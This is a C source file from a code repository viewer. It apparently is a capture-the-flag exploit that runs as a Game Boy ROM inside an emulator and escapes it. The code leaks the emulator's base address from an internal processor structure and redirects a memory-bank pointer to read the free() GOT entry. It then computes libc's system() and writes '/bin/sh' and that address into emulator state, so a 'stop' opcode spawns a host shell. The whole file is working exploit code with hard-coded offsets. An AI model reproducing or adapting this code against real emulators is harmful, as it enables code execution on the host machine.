blob: f5f39dd294a037b967ffc6094ef8df918e0ca65d (
plain) (
blame)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
|
#include "stdint.h"
#include "string.h"
void
main(void)
{
volatile static uint8_t *processor_gb;
volatile static uint8_t *memory_gb;
volatile static uint8_t *free_got_gb;
volatile static uint64_t op0x00;
volatile static uint64_t base;
volatile static uint64_t libc;
volatile static uint64_t free_got;
volatile static uint64_t target;
/* NEEDS TO BE FIRST SESSION OF CONTAINER! */
/* processor - wrambanks = -0x126a0 */
/* WRAM BANK = -0x13 */
processor_gb = (void*) 0xD960;
memory_gb = processor_gb - 0xd0;
/* get base from op0x00 */
op0x00 = *(uint64_t*)processor_gb;
base = op0x00 - 0x1d420;
free_got = base + 0x4ad78;
/* change lcdrambank pointer to access got */
*(uint64_t*)(memory_gb+0x90) = free_got;
free_got_gb = (void*) 0x8000;
libc = (*(uint64_t*)free_got_gb) - 0x9a6d0;
target = libc + 0x52290;
strcpy((char*)processor_gb, "/bin/sh");
*(uint64_t*)(processor_gb+0x10*0x10) = target;
__asm \
stop \
__endasm;
while (1);
}
|
